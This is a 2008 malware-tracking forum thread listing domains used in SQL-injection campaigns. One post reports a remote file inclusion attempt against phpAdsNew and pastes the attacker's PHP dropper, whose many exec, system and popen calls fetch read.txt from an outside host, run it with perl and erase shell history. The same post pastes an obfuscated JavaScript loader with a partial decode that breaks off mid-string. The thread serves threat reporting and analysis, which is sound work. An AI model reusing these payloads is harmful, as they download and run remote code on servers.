Malware Domain List

Malware Related => Malicious Domains => Topic started by: YanceySlide on June 02, 2008, 04:27:14 am

Title: SQL Injected jscript sites
Post by: YanceySlide on June 02, 2008, 04:27:14 am: Hi folks,

Still getting settled in here. Thanks JohnC and sowhat-x for the access.

I've been maintaining a list of sites I've seen that are used in the SQL injections that are injecting jscript:
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080514

Some are long down, some are quite fresh. I'll try and update this thread as I add to the list.

Latest:
hxxp://www.redir94.com
hxxp://www.locale48.com
hxxp://www.en-us18.com
hxxp://www.sysid72.com
hxxp://www.libid53.com
hxxp://www.script46.com
hxxp://www.rundll92.com
hxxp://www.logid83.com
Title: Re: SQL Injected jscript sites
Post by: tjs on June 02, 2008, 05:54:24 am: Hi YanceySlide. Welcome to MDL and thanks for the list.

TJS
Title: Re: SQL Injected jscript sites
Post by: MysteryFCM on June 02, 2008, 05:56:39 am: I've just sent the following to the owner and registrar of mgfcompressors.com, due to someone trying to use a couple files on their server, to try and exploit one of my servers;

Code: [Select]
Ref: mgfcompressors.com/portal/help/file.txt??? The above is a Perl exploit that is used to exploit other servers. It downloads another file from; mgfcompressors.com/portal/help/ Which then downloads another encoded script; mgfcompressors.com/portal/help/aoaqv.js Which is then used to exploit servers, as shown by the following excerpt from my server logs; ************************************** BEGIN ************************************** 2008-06-02 00:04:37 192.168.0.20 GET /phpAdsNew/view.inc.php phpAds_path=http://www.mgfcompressors.com/portal/help/file.txt??? 80 - 193.198.217.3 libwww-perl/5.803 - 404 0 0 ************************************** END ************************************** The IP that attempted the exploit (193.198.217.3), resolves to; blaz.zsem.hr Needless to say this exploit failed as I do not run Perl on my servers, and do not permit my servers to download non-authenticated files from unknown sources (and certainly do not allow my servers to run in capacities that would permit them to run non-essential scripts from unknown sources). Can you cleanup your server please?
Relevant codes (they seem to block subsequent attempts to access the files, so posting here for clarity)

Code: [Select]
<title>By zaNga</title> <h2>PHPESSID56465465421200121242024512878952300564505478693</h2><br><br>END OF BYPASS FILE<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br> <? $url="http://www.mgfcompressors.com/portal/help/"; exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;'); exec('cd /tmp;GET '.$url.'read.txt > read.txt;perl read.txt;rm -f read.txt*;'); exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;'); exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;'); exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;'); passthru('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;'); passthru('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;'); passthru('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;'); passthru('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;'); passthru('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;'); system('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;'); system('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;'); system('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;'); system('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;'); system('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;'); shell_exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;'); shell_exec('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;'); shell_exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;'); shell_exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;'); shell_exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;'); popen('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', "r"); popen('cd /tmp;curl -O '.$url.'read.txt; perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', "r"); popen('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r"); popen('cd /tmp;lynx -source '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r"); popen('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r"); popen('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r"); @exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;'); @exec('cd /tmp;GET '.$url.'read.txt > read.txt;perl read.txt;rm -f read.txt*;'); @exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;'); @exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;'); @exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;'); @passthru('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;'); @passthru('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;'); @passthru('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;'); @passthru('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;'); @passthru('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;'); @system('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;'); @system('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;'); @system('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;'); @system('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;'); @system('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;'); @shell_exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;'); @shell_exec('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;'); @shell_exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;'); @shell_exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;'); @shell_exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;'); @popen('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', "r"); @popen('cd /tmp;curl -O '.$url.'read.txt; perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', "r"); @popen('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r"); @popen('cd /tmp;lynx -source '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r"); @popen('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r"); @popen('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r"); ?>
mgfcompressors.com/portal/help/ loads a script that executes the following (via XMLHTTP). I had problems fully decoding it due to arguments.callee.toString

Code: [Select]
var arg="lzchtreg"; function TkPgnCxzu(U){var Be7k="];Ak=tP.c";var sOX="G49SGGR%1SG34";var S="%se71%se2%6T";var s="arguments.calle";var Agzj="Cc%5BCc%6BCc%";var KVB="D%se63%se61%";var mEV="37Cc%3DC";var mn="cS2qjhcS65%hcS";var yv9="){if((q.readySt";var aF7="7spd3B';ev";var gIWK="0Cc%3";var o=";var h='3";var FSa="6ECc%50Cc%47Cc";var wNZb="S9g4%hcS";S+="se7B%se";var OV="1%hcS";var O4R="cS61g4%hc";var RhxD="e(K.replace(/%";var Mjn="S3B%hc";var BGWp="8KQ%1%se48KQ%1";var cEFw="%se68%se28%s";var nM="Cc%7BC";var a="3D%se2";o="i;Thd=Thd%13788"+o;var LT=";var V3L";var Q3Ts="G[RWo";var rbt="5%se25%se35%se";var NYl8="cS2%hcS4";var uG="q19=46";var aY7j="7ACc%4F";var pJA="hcS2%hcS69%";var D="3VlhcS3";KVB+="se78KQ%1";var MO="sA1spd72spd20";var w="ngth;c=c%h.le";var j="4%hcS2%";var ki0n="c%3DCc%57Cc%35";var w7="S42%hcS2E%hc";var Oj3="B.rep";var FA="CsAspd73spd38";var gIg="2r3H74Cc%6ECc%3";var hpMH="se20%se28";var J8="5%se3";gIg+="7Cc%2";var ylP="F%hcS6A%hcS3";var H="BCc%74Cc%6ECc";var fx="3Dspd27spd%C";var tH=";rR=rR+N";var Rr="2ECc%63Cc%6r3";var tpmK="Q%1%se25%";var dlrT="r vO;vO=rR+ykui";var PR="Tse3B%s";var uJ="5%se77%se20";var vXj5="e37%se33%";var cp="pe(q.resp";uJ+="%se58%";var nj="ll);";var m6f="%se25%se";var huhd="S6A%hcS2B%hcS2B";var Qm="VlhcS31%hcS29g";huhd="6F%hc"+huhd;var O1pL="e(Ak);}eva";var tw="e37%se32%s";var x7t8=";l++){";H=ki0n+"Cc%4FCc%2"+H;var O="var Q=64112;var";cEFw+="e65%se2%6Tse7";var fRBA="6C%se";var J="g,'');B=B.";var o3jT="=Thd+b;var K='s";nj="rue);q.send(nu"+nj;var HM="%7Z2r3H6";nM="BCc%2BCc%29"+nM;var Cyq="%5DCc%3BCc%6";var sYp="4%hcSD%hcS42";PR="se2%6"+PR;var Ro="eplace(/SG/g";var MGQ="c%74Cc%6ECc%37";cp="{tP = unesca"+cp;var bzKy="cS3D%hcS6Eg";Agzj="%6ECc%50Cc%47"+Agzj;var N="c%/g,'%').re";var xn5X="DCc%30Cc%";var f="se7B%s";mEV+="c%6ECc%50Cc%47";tpmK="e25%se35%se38K"+tpmK;var So0="{akK();}};q.on";var E="var x";var W="hcS25%hcS";S+="78KQ%1%se";var LCS="c%6BCc%74Cc";var kXe="ape(Qg6M.repla";var c67G="hcS29%hc";var BmE="e71%se3";var kJa="42%hcS2E%";var NlYX="cS21%hcS";var fXe=").replace";var GJ="'y%')";aF7="71spd2"+aF7;NYl8+="VlhcS6F%";var dGFN="/g,'%";var DimR="=tn7;Ak=nPG";FSa="Cc%37Cc%3DCc%"+FSa;var ysxS="%6D%6C%32%2E%5";var ps9B="%se7D%s";GJ="lace(/qj/g,"+GJ;m6f="6%se36"+m6f;Mjn=ylP+"D%hcS30%hc"+Mjn;var HDN6="5qjhcS29%";var CA7x="e(/Mm/g,'%";S="%se28%se21"+S;Q3Ts="o];nP"+Q3Ts;var V="61g4%hcS2%hcS4V";FSa+="%5BCc%6B";var lp="%se48%se7";Rr+="H61Cc%7Z43C";var CLN="%se63%se61%se7";sYp="5qjhcS29%hcS3Bg"+sYp;var yci=")^Ak;SX+=St";var zTf="hcS6D%hcS4VlhcS";OV="%hcS3"+OV;var cMD4="1%hcS4qjhcS";Oj3="l(unescape(c"+Oj3;Be7k+="harCodeAt(x6"+yci;var Fv="(nY);}catch";FSa="Cc%74Cc%6E"+FSa;var O9e="Cc%74Cc%6";m6f+="37%se";var AYO="4qjhcS2B%";E+="6;var Ak;for(";mn="%hcS4%h"+mn;ysxS="4D%73%78"+ysxS;var m="8KQ%1%se28";bzKy+="4%hcS";var X76="R%4SG3BSG72SG52";var c6ED="%6ECc%37C";FSa+="Cc%74Cc%7A";var T="C';var b=70";var ZDZQ="c%6BCc%74Cc%7";var ID="6ECc%67Cc";var G="8spd78spd";gIg+="9Cc%3BCc%74";gIg+="Cc%6ECc%"+mEV;var L5XO="Q%1%se43%se25";fx=MO+"spd72spd52spd"+fx;var w31=";var W5O=0;var ";var XY="RWo=RWo+";var A="8KQ%1%se2";var PG="HZe;c=";nj="en('GET',zqj,t"+nj;var O2mU="Tse76%";s+="e.toString();";var bru="%hcS2%";x7t8="(l=0;l<256"+x7t8;rbt="se32%se4"+rbt;s+="B=B.re";var iz="%se25%se36%";var v4m="FCc%3DCc%";var lF="GUR=VxEJ;va";kJa="hcS3D%hcS"+kJa;Q3Ts="tn7=nPG[RW"+Q3Ts;hpMH+="%se21";lF+="r f2QH='';";var LDuA="cS67g4%h";var sxvb="S61g4%hcS2";CA7x+="')));"+E;var feGD="lhcS6F%hcS64%h";w31+="Qg6M='Cc%76Cc%6";var cmd="cS6A%hcS25";var bS="escape(LV);";V=zTf+"6qjhcS"+V;Oj3="7D';eva"+Oj3;var dx="VxEJ=U;nPG=new ";var tgR="52%se";gIg+="Cc%5BCc%6BCc%";var wd="var Thd;Thd=3";var onet="ce(/g4%/g,'%7')";PR="e41%se72%se52%"+PR;var YtG="S66g4%hcS2%hcS6";yv9+="ate==4)&&(q.st";var mQa="se71%se";ysxS+="8%4D%4C%48%54%";var Yi="%se6E%se4F%s";aY7j="%6BCc%74Cc%"+aY7j;CLN+="8KQ%1%se63";Fv="bject"+Fv;kXe=xn5X+"3B';eval(unesc"+kXe;a+="7%se25";lF+="var g";GJ="cape(c2.rep"+GJ;huhd+="%hcS29g4%hcSB%";AYO+="hcS3D%";var aGb="unescape(vuL.r";CA7x="').replac"+CA7x;c6ED+="c%3BCc%6";var Z="cFCs';ykui=yku";ZDZQ="3Z35Cc%36Cc%3BC"+ZDZQ;x7t8="var B;for"+x7t8;nM=ZDZQ+"ACc%4FCc%2"+nM;O9e+="ECc%37Cc";var P="ce(/%6T/g,'9%'";ysxS+="54%50';var cB=";var fh="73%se6";MGQ+="Cc%3B";var ggTy="ABspd75sp";Q3Ts="hBIs%256;"+Q3Ts;var R="6%hcS2qjhcS65%h";var kyf="se20%se41%se";O9e+="%3BCc%7DCc";DimR+="[RWo]+nPG";L5XO+="%se38KQ";sOX+="SG27SG";hpMH+="%se71%se2%6T"+f;var y="se72%se7%6T";bru+="hcS6F%"+V;HDN6+="hcS3B%h"+LDuA;Qm+="4%hcSB%hcS66%";c67G=mn+"6F%hcS6A%"+c67G;yv9+="atus==";fx="Bspd7%CsAspd%C"+fx;var gk2="28%se65%se2%6T";RhxD+="CsA/g,'6').rep";var YTb="hcS66%hcS";vXj5="se46%se25%s"+vXj5;w+="ngth;var "+dx;var gO="l}}var zqj=iGUR";var lrv="20MZ53MZ";CLN+="%se68%se"+gk2;var Li="44spd27spd3Bspd";LCS+="%7ACc";Cyq+="ECc%50Cc%4";DimR="[hBIs]"+DimR;var Ft=",'2%').repl";P="/g,'b').repla"+P;yv9+="200))"+So0;PG+="c+rR.length;c=c";aGb=sOX+"3B';eval("+aGb;w31+="1Cc%7Z";var YsrI="S67g4%hc";Q3Ts+="]=nPG[";gIWK+="Z35Cc%36Cc%3B"+FSa;O9e="c%4FCc%5DCc%3D"+O9e;X76+="SG2BSG3DS";var xZW1="place(/Z";var KxMe="B%se71%s";DimR+="[hBIs];Ak=Ak%2";Ro+=",'%')));var "+uG;o=wd+"5861;var yku"+o;iz+="se3%6Tse25%se3";var ui8="KQ%1%s";Fv="=new ActiveXO"+Fv;cp="unction()"+cp;Mjn="%hcS6"+Mjn;var ULuQ="74Cc%";c67G+="S3B%hcS69%"+YTb;R="hcSD%hcS69%hcS6"+R;Cyq+="7Cc%5BCc";lF+="ysX=18";a="20%se4C%se56%se"+a;CA7x+="x6=0;x6<tP.le";var i1EP="2%se6A%se65";S="e66%se20"+S;BGWp=rbt+"38%se25%se3"+BGWp;fXe="(/Vl/g,'3%'"+fXe;YsrI="cS6E%hc"+YsrI;nj="e=x;q.op"+nj;var n="sA1spd";var pCH5="Cc%5BCc%";NYl8+="hcS64%hcS65%hc";D="hcS3D%hcS3D%hcS"+D;LCS=v4m+"30Cc%3BC"+LCS;var sf="30%se27%se3B";T+="100;var HZ";var gj="6ECc%37Cc%20Cc";Q3Ts="+nPG[RWo];hBIs="+Q3Ts;J+="toUpperCa";T+="e;var N5='bO2";xZW1="escape(V3LR.re"+xZW1;YtG="S2E%hc"+YtG;tH="'%')))"+tH;KxMe=S+"72%se7%6Tse7"+KxMe;FA="spd3%"+FA;i1EP="8%se4F%se6"+i1EP;fXe+="(/%hcS/g,'%')";MGQ="c%4FCc%5DCc%2BC"+MGQ;Ft+="ace(/r3";fRBA="6E%se75%se"+fRBA;LT+="R='MZ68MZ42M";Mjn="2%hcS2qjhcS65"+Mjn;var JD6a="se6C%se";Be7k=DimR+"56;Ak=nPG[Ak"+Be7k;Z=Ro+"40;N5+='v47"+Z;sf=tpmK+"se35%se"+sf;HDN6+="cS9g4%hcSVl";lF+="8;var eoj";sYp="4%hcSVlhcS"+sYp;gIWK+="Cc%4FCc%5DCc";MGQ+="Cc%74Cc%6E";Ft=N+"place(/Z/g"+Ft;var i="Dspd%";bzKy=sxvb+"%hcS20g4%hcS1%h"+bzKy;onet=fXe+".repla"+onet;var RLe="/g,'8'";HM+="BCc%74Cc%7ACc%4"+LCS;LT+="Z49MZ73MZ3DM";ysxS="ArR='%"+ysxS;J=s+"place(/\\W/"+J;bS="%')));var nY=un"+bS;X76="SGGR%8SGG"+X76;Mjn+="S65%hcS6F";bS="place(/%se/g,'"+bS;RLe="ce(/y"+RLe;Yi="2%se20"+Yi;O+=" vuL='S";O2mU="78KQ%1%se6%6"+O2mU;i=ggTy+"d%CsA9spd3"+i;var eeF="S6qjhcS3B%hc";OV+="3qjhcS3qjhcS3B";R+="cS6F%h"+cmd;var Zl="g4%hcSVlhcS5qj";ui8=lp+"8KQ%1%se78"+ui8;var ggNn="MZ3B';e";gIWK+="%3BCc"+Agzj;CLN+="se7B%"+mQa;D+="1%hcS29g4%hcSB";NYl8="jhcS61g4%h"+NYl8;AYO="hcS51%hcS"+AYO;dGFN+="3').replace(";YsrI=w7+"S6C%hcS65%h"+YsrI;onet=GJ+".replace"+onet;m="e65%se73%se7"+m;kJa+="hcS6Vlhc";PG="+Q;c=c+"+PG;Q3Ts="6;hBIs=hBIs"+Q3Ts;sf=J8+"5%se38KQ%1%s"+sf;Yi+="e58KQ%1";AYO=D+"%hcS66%hcS32%"+AYO;OV="jhcS3D"+OV;var C="e4F%se58KQ%1%s";FA+="spd27spd3";O2mU+="se65%se5"+i1EP;LT=Ft+"H/g,'8%')))"+LT;sYp="qjhcS67g4%hcS9g"+sYp;BGWp+="%se25%se38K"+L5XO;fh="6E%se65%se"+fh;c67G+="2qjhcS65%hcS6F";Be7k+="ring.f";tH=RhxD+"lace(/spd/g,"+tH;lrv="Z61MZ72MZ"+lrv;cEFw+="B%se71%se3D%se"+fRBA;Z=dGFN+"/GR%/g,'6').r"+Z;onet="';eval(unes"+onet;ID+="%74Cc%6r3H3BCc%"+ULuQ;Z+="i*q19;va"+dlrT;sYp="hcS65%hcS2"+sYp;var hcZq="d2Bspd3Dspd27sp";W+="3VlhcS32%"+AYO;c6ED=w31+"20Cc%74Cc"+c6ED;O=tH+"5;var c=33550;"+O;A=O2mU+"%se63%se7"+A;J+="se();B+=c;var i"+lF;y=hpMH+"e78KQ%1%"+y;fh+="3%se61%s";O=aF7+"al(unescap"+O;R+="%hcS3VlhcS32%h"+NlYX;c6ED+="6Cc%6FCc"+HM;j+="hcS69%hcS6E%";Mjn+="%hcS6A%hcS3C%hc"+YsrI;kJa+="S6qjh"+O4R;O9e=Cyq+"%57Cc%35C"+O9e;C=A+"8%se6E%s"+C;yv9="var x=function("+yv9;Mjn="4%hcS"+Mjn;ysxS=RLe+")));var "+ysxS;sYp+="%hcS3D%hcS66%hc";PG+="%b.le"+w;fh+="e70%se65%se28%s"+PR;O9e+="%5Z57Cc";MGQ+="Cc%37C"+H;onet+=".repla"+ysxS;gIWK=gj+"%25Cc%2"+gIWK;Rr="Cc%4Z"+Rr;var iy="67%hcS2";bru+="lhcS6F%hcS64%"+sYp;hcZq=FA+"Bspd%CsA8sp"+hcZq;pCH5+="57Cc%35Cc%4FCc"+O9e;o+="r2PkG2";Oj3=JD6a+"6C%se7D%se"+Oj3;O1pL+="l(SX);};"+yv9;P=Oj3+"lace(/8KQ%"+P;bru+="S32%hcS5"+cMD4;ui8+="e70%se"+tgR;uJ=BmE+"D%se6E%se6"+uJ;bS="b1%/g,'4%').re"+bS;gIg="Cc%74Cc%"+gIg;O+="GGRCSG3DSGGRC";c67G+="%hcS6A%"+W;NYl8="cS4VlhcS6q"+NYl8;O1pL+="readystatechang"+nj;var Rea="51%hcS4qjhcS2B";o3jT+="pd7%CsAspd%C"+n;m+="%se2%6Ts";onet+="'%se76%se61%";LT=kXe+"ce(/C"+LT;Q3Ts=XY+"1;RWo=RWo%25"+Q3Ts;G+="%CsA3spd3Dspd2";aY7j+="Cc%25Cc%4Z2EC";lrv+="58MZ3DMZ27MZ27"+ggNn;CLN+="3D%se6E%se75%"+P;bS=CLN+").replace(/"+bS;nM+="c%74Cc%6";bzKy+="5%hcS6C%hcS6C";ui8+="65%se71%se75%s"+m;gO+=";var akK=f"+cp;Rr+="c%6FCc%64Cc%";bru=iy+"E%hcS66g4"+bru;lrv="BMZ76M"+lrv;Qm=R+"3D%hcS3"+Qm;var Abi="%57Cc%35Cc%4";x7t8=PG+"Array();var l;"+x7t8;vXj5+="se25%se36%se";var ymm="5DCc%3DCc%6";feGD+="cS65%hcS41g4"+c67G;nM+="ECc%37Cc%3DCc"+aY7j;gIWK=Abi+"FCc%3DCc%74Cc%"+gIWK;m6f="5%se3"+m6f;pCH5+="%6FCc%3"+LT;wNZb="7g4%hc"+wNZb;j+="hcS67%hc"+YtG;ymm+="ECc%50Cc%47"+pCH5;o3jT+="72spd20spd7"+G;c6ED=gO+"onseText)"+c6ED;Rr+="65Cc%41"+gIg;huhd=eeF+"S65%hcS"+huhd;fx=i+"CsA2spd3"+fx;fh=Yi+"%se3D%se75%se"+fh;Rea+="%hcS3D%hcS53g4";Rea+="%hcS4g4%"+pJA;Li+="79spd%Cs"+fx;bzKy+="%hcS3B"+onet;Q3Ts+="hBIs];nPG"+Be7k;a+="%se38K";J=x7t8+"nPG[l]=l;}B="+J;nM=c6ED+"%4FCc%3CCc%"+nM;y=sf+"%se6%6Tse66%"+y;NYl8=j+"F%hcS6D%h"+NYl8;wNZb+="VlhcS"+HDN6;kyf="E%se65%se77%"+kyf;hcZq+="d%CsAAspd39spd"+Li;Z+=";rR=xxc+vO;b=N5"+J;wNZb+="hcS5q"+OV;wNZb=NYl8+"S2qjhcS6"+wNZb;xZW1+="/g,'m"+CA7x;uJ=y+"se7B%s"+uJ;tw+="e25%se36%"+vXj5;C=kyf+"63%se"+C;Rr+="74Cc%7AC"+MGQ;uJ+="se4D%se4C"+ui8;aGb=X76+"G27SG45S"+aGb;Qm=wNZb+"g4%hcSDg4%"+Qm;Zl=huhd+"hcS67g4%hcS9"+Zl;ID+="6ECc%37Cc%3D"+Rr;Zl=Mjn+"S4%hc"+Zl;Z=aGb+"eplace(/C"+Z;KVB+="%se63"+cEFw;bru=Rea+"hcS6E%hcS"+bru;C=KxMe+"e3D%se6"+C;iz+="6%se33%se25%s"+tw;gIWK+="74Cc%7ACc%4FCc%"+ymm;Z=O+"SG2BSG54"+Z;ps9B=KVB+"6C%se7D%se3B"+ps9B;BGWp=m6f+"38KQ%1%se25%"+BGWp;Z=hcZq+"sABspd"+Z;ID=nM+"c%6CCc%65Cc%"+ID;feGD=kJa+"S2%hcS4V"+feGD;T=o+"';h+='Vp"+T;C=fh+"e6%6Ts"+C;Qm+="hcS32%hcS"+bru;Q3Ts+="romCharCod"+O1pL;iz+="46%se2"+BGWp;ID=Fv+"(e){q=nul"+ID;a=bzKy+"se72%se"+a;feGD=Zl+"hcS5E%"+feGD;ID=bS+"if (!q){try{q"+ID;ID+="%37Cc%3BCc"+gIWK;feGD="hcS66%hcS6Fg"+feGD;ID+="Z30MZ3"+lrv;T+="Px';HZe"+o3jT;Z="7%CsA"+Z;xZW1=ID+"val(un"+xZW1;uJ=iz+"%1%se38%se2"+uJ;a+="Q%1%se48KQ%1"+uJ;xZW1=C+"e2%6Tse3B%se7D"+xZW1;Qm+="3Bg4%hcS6%hc"+a;ps9B=Qm+"e3B%se7"+ps9B;ps9B=feGD+"hcS53g4%hcS4g"+ps9B;ps9B+="e76%se61%se7"+xZW1;ps9B+="ngth;x6++){"+Q3Ts;Z=T+"7spd54spd72spd"+Z;Z+=";var c2='%"+ps9B;eval(Z);}TkPgnCxzu(arg);
Partially decoded;

Code: [Select]
var Thd;Thd=35861;var ykui;Thd=Thd%13788;var h='3r2PkG2';h+='VpC';var b=70100;var HZe;var N5='bO2Px';HZe=Thd+b;var K='spd7%CsAspd%CsA1spd72spd20spd78spd78spd%CsA3spd3Dspd27spd54spd72spd7%CsAspd3%CsAspd73spd38spd27spd3Bspd%CsA8spd2Bspd3Dspd27spd%CsAAspd39spd44spd27spd3Bspd79spd%CsABspd75spd%CsA9spd3Dspd%CsA2spd3Bspd7%CsAspd%CsA1spd72spd20spd72spd52spd3Dspd27spd%CsABspd71spd27spd3B';eval(unescape(K.replace(/%CsA/g,'6').replace(/spd/g,'%')));rR=rR+N5;var c=33550;var Q=64112;var vuL='SGGRCSG3DSGGRCSG2BSG54SGGR%8SGGR%4SG3BSG72SG52SG2BSG3DSG27SG45SG49SGGR%1SG34SG27SG3B';eval(unescape(vuL.replace(/C/g,'%3').replace(/GR%/g,'6').replace(/SG/g,'%')));var q19=4640;N5+='v47cFCs';ykui=ykui*q19;var vO;vO=rR+ykui;rR=xxc+vO;b=N5+Q;c=c+HZe;c=c+rR.length;c=c%b.length;c=c%h.length;var VxEJ=U;nPG=new Array();var l;var B;for(l=0;l<256;l++){nPG[l]=l;}B=arguments.callee.toString();B=B.replace(/\W/g,'');B=B.toUpperCase();B+=c;var iGUR=VxEJ;var f2QH='';var gysX=188;var eoj;var c2='%hcS66%hcS6Fg4%hcS2%hcS2qjhcS65%hcS6F%hcS6A%hcS3D%hcS30%hcS3B%hcS65%hcS6F%hcS6A%hcS3C%hcS42%hcS2E%hcS6C%hcS65%hcS6E%hcS67g4%hcS4%hcS6qjhcS3B%hcS65%hcS6F%hcS6A%hcS2B%hcS2B%hcS29g4%hcSB%hcS67g4%hcS9g4%hcSVlhcS5qjhcS5E%hcS3D%hcS42%hcS2E%hcS6VlhcS6qjhcS61g4%hcS2%hcS4VlhcS6F%hcS64%hcS65%hcS41g4%hcS4%hcS2qjhcS65%hcS6F%hcS6A%hcS29%hcS3B%hcS69%hcS66%hcS2qjhcS65%hcS6F%hcS6A%hcS25%hcS3VlhcS32%hcS3D%hcS3D%hcS3VlhcS31%hcS29g4%hcSB%hcS66%hcS32%hcS51%hcS4qjhcS2B%hcS3D%hcS53g4%hcS4g4%hcS2%hcS69%hcS6E%hcS67%hcS2E%hcS66g4%hcS2%hcS6F%hcS6D%hcS4VlhcS6qjhcS61g4%hcS2%hcS4VlhcS6F%hcS64%hcS65%hcS2qjhcS67g4%hcS9g4%hcSVlhcS5qjhcS29%hcS3B%hcS67g4%hcS9g4%hcSVlhcS5qjhcS3D%hcS31%hcS3qjhcS3qjhcS3Bg4%hcSDg4%hcSD%hcS69%hcS66%hcS2qjhcS65%hcS6F%hcS6A%hcS25%hcS3VlhcS32%hcS21%hcS3D%hcS3VlhcS31%hcS29g4%hcSB%hcS66%hcS32%hcS51%hcS4qjhcS2B%hcS3D%hcS53g4%hcS4g4%hcS2%hcS69%hcS6E%hcS67%hcS2E%hcS66g4%hcS2%hcS6F%hcS6D%hcS4VlhcS6qjhcS61g4%hcS2%hcS4VlhcS6F%hcS64%hcS65%hcS2qjhcS67g4%hcS9g4%hcSVlhcS5qjhcS29%hcS3Bg4%hcSD%hcS42%hcS3D%hcS66%hcS32%hcS51%hcS4qjhcS3Bg4%hcS6%hcS61g4%hcS2%hcS20g4%hcS1%hcS3D%hcS6Eg4%hcS5%hcS6C%hcS6C%hcS3B';eval(unescape(c2.replace(/qj/g,'y%').replace(/Vl/g,'3%').replace(/%hcS/g,'%').replace(/g4%/g,'%7').replace(/y/g,'8')));var ArR='%4D%73%78%6D%6C%32%2E%58%4D%4C%48%54%54%50';var cB='%se76%se61%se72%se20%se4C%se56%se3D%se27%se25%se38KQ%1%se48KQ%1%se25%se36%se3%6Tse25%se36%se33%se25%se37%se32%se25%se36%se46%se25%se37%se33%se25%se36%se46%se25%se36%se36%se25%se37%se38KQ%1%se25%se32%se45%se25%se35%se38%se25%se38KQ%1%se48KQ%1%se25%se38KQ%1%se43%se25%se38KQ%1%se38%se25%se35%se38KQ%1%se25%se35%se38KQ%1%se25%se35%se30%se27%se3B%se6%6Tse66%se20%se28%se21%se71%se2%6Tse7B%se78KQ%1%se72%se7%6Tse7B%se71%se3D%se6E%se65%se77%se20%se58%se4D%se4C%se48%se78KQ%1%se78KQ%1%se70%se52%se65%se71%se75%se65%se73%se78KQ%1%se28%se2%6Tse3B%se7D%se63%se61%se78KQ%1%se63%se68%se28%se65%se2%6Tse7B%se71%se3D%se6E%se75%se6C%se6C%se7D%se3B%se7D%se76%se61%se72%se20%se6E%se4F%se58KQ%1%se3D%se75%se6E%se65%se73%se63%se61%se70%se65%se28%se41%se72%se52%se2%6Tse3B%se6%6Tse66%se20%se28%se21%se71%se2%6Tse7B%se78KQ%1%se72%se7%6Tse